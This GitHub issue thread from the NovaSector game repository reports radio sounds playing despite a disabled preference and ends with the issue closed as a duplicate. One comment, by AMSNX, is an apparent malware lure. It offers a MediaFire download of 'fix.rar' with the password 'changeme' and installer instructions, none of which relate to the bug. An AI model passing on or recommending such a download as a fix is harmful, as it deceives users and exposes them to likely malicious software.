### ISSUE TITLE
Hearing radio noises from headset while the option is disabled in preferences

### ISSUE THREAD

**Issue by Zorazi-Teo-Daedalus** [NovaSector/NovaSector#4320] opened 2024-08-26 23:30 UTC
### Client Version:

515.1642

### Issue Summary:

Well, I've got radio sounds toggled off because it gets aggravating after a while. Then spontaneously I started hearing them despite the setting being disabled. I turned it back on, and then off again, and it was still playing the sound repeatedly every time I heard something over any communication channel.

### Round ID:

[11538](https://scrubby.melonmesa.com/round/11538)

### Test Merge Information:

- [[TESTING ONLY] Debugging overlay cap being reached with taur parts](https://github.com/NovaSector/NovaSector/pull/2754)
- [Revert "[MIRROR] Refactor Stat Panel styles and more TGUI-like appearance [MDB IGNORE]"](https://github.com/NovaSector/NovaSector/pull/4095)
- [Xenoarchaeology Artifacts](https://github.com/NovaSector/NovaSector/pull/4281)
- [Plutonian 'Sapper Gang' Mid-Round](https://github.com/NovaSector/NovaSector/pull/4069)

### Reproduction Steps:

Play game.
Hear noise countless times.
P A I N

**Comment by RatFromTheJungle** [comment] 2024-08-27 00:08
seems your TTS volume setting is also ignored, and reset to the default

**Comment by AMSNX** [comment] 2024-08-27 00:41
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sadboysuss** [comment] 2024-08-28 10:56
Dupe of https://github.com/NovaSector/NovaSector/issues/4322

**Closed by Sadboysuss** 2024-08-28 10:56 UTC
